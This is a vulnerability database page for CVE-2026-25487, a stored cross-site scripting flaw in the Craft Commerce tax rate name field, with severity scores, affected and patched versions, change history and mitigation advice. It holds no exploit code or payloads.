Description
Craft Commerce is an ecommerce platform for Craft CMS. In versions from 4.0.0-RC1 to 4.10.0 and from 5.0.0 to 5.5.1, a stored XSS vulnerability in Craft Commerce allows attackers to execute malicious JavaScript in an administrator's browser. This occurs because the Tax Rates 'Name' field in the Store Management section is not properly sanitized before being displayed in the admin panel. This issue has been patched in versions 4.10.1 and 5.5.2.
Published: 2026-02-03
Score: 6.1 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Stored Cross‑Site Scripting in Admin Panel
Action: Immediate Patch
AI Analysis

Impact

Craft Commerce, an ecommerce module for Craft CMS, contains a stored cross‑site scripting flaw in the “Name” field of tax rates within the Store Management section. The input is accepted without proper sanitization, allowing an attacker to embed malicious JavaScript that executes in the browser of any administrator who views the affected tax rate. Because the code runs with the privileges of the admin interface, an attacker can steal session cookies, modify data, or further compromise the system, effectively escalating privileges within the application.

Affected Systems

Vendors affected are Craft CMS Commerce. The vulnerability is present in all releases from 4.0.0‑RC1 through 4.10.0 and from 5.0.0 through 5.5.1. The problem was addressed in version 4.10.1 and in version 5.5.2. Any installations running an earlier version of either major release line are at risk. The affected component is the Tax Rates name field supplied by administrators via the back‑office UI.

Risk and Exploitability

On the CVSS scale the score is 6.1, indicating a moderate severity. The EPSS value is below 1 %, suggesting a low probability of exploitation at this time, and the vulnerability has not yet appeared in the CISA KEV catalog. Because the flaw requires a privilege to insert or edit tax rates, the attack vector is mainly through authenticated access to the commerce back‑office. An attacker who can create or modify a tax rate can place a payload that later runs when a legitimate administrator opens the rate, leading to client‑side code execution in the admin context.

Generated by OpenCVE AI on April 18, 2026 at 00:12 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Patch Craft Commerce to version 4.10.1 or 5.5.2, whichever applies to your installation.
  • Restrict access to the Tax Rates configuration page to a small set of trusted administrators until the update can be applied.
  • Enable a strict Content Security Policy on the Craft CMS admin interface, disallowing inline scripts and approving only known trusted sources.
  • Monitor the admin console for unexpected changes to tax rate names and review any new entries for suspicious characters.

Generated by OpenCVE AI on April 18, 2026 at 00:12 UTC.

Tracking

Sign in to view the affected projects.

Advisories
Source ID Title
Github GHSA Github GHSA GHSA-wqc5-485v-3hqh Craft CMS has Stored XSS in Tax Rates Name Leading to Potential Privilege Escalation
History

Tue, 10 Feb 2026 18:15:00 +0000

Type Values Removed Values Added
First Time appeared Craftcms craft Commerce
CPEs cpe:2.3:a:craftcms:craft_commerce:*:*:*:*:*:craft_cms:*:*
cpe:2.3:a:craftcms:craft_commerce:4.0.0:-:*:*:*:craft_cms:*:*
cpe:2.3:a:craftcms:craft_commerce:4.0.0:rc1:*:*:*:craft_cms:*:*
Vendors & Products Craftcms craft Commerce
Metrics cvssV3_1

{'score': 4.8, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}

Wed, 04 Feb 2026 22:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'poc', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Wed, 04 Feb 2026 12:15:00 +0000

Type Values Removed Values Added
First Time appeared Craftcms
Craftcms commerce
Vendors & Products Craftcms
Craftcms commerce

Tue, 03 Feb 2026 18:30:00 +0000

Type Values Removed Values Added
Description Craft Commerce is an ecommerce platform for Craft CMS. In versions from 4.0.0-RC1 to 4.10.0 and from 5.0.0 to 5.5.1, a stored XSS vulnerability in Craft Commerce allows attackers to execute malicious JavaScript in an administrator's browser. This occurs because the Tax Rates 'Name' field in the Store Management section is not properly sanitized before being displayed in the admin panel. This issue has been patched in versions 4.10.1 and 5.5.2.
Title Craft CMS has Stored XSS in Tax Rates Name Leading to Potential Privilege Escalation
Weaknesses CWE-79
References
Metrics cvssV4_0

{'score': 6.1, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:L/SI:H/SA:N'}

Subscriptions

Craftcms Commerce Craft Commerce
cve-icon MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-02-04T21:13:17.130Z

Reserved: 2026-02-02T16:31:35.822Z

Link: CVE-2026-25487

cve-icon Vulnrichment

Updated: 2026-02-04T21:13:11.213Z

cve-icon NVD

Status : Analyzed

Published: 2026-02-03T19:16:26.360

Modified: 2026-02-10T18:10:55.623

Link: CVE-2026-25487

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-18T00:15:31Z

Weaknesses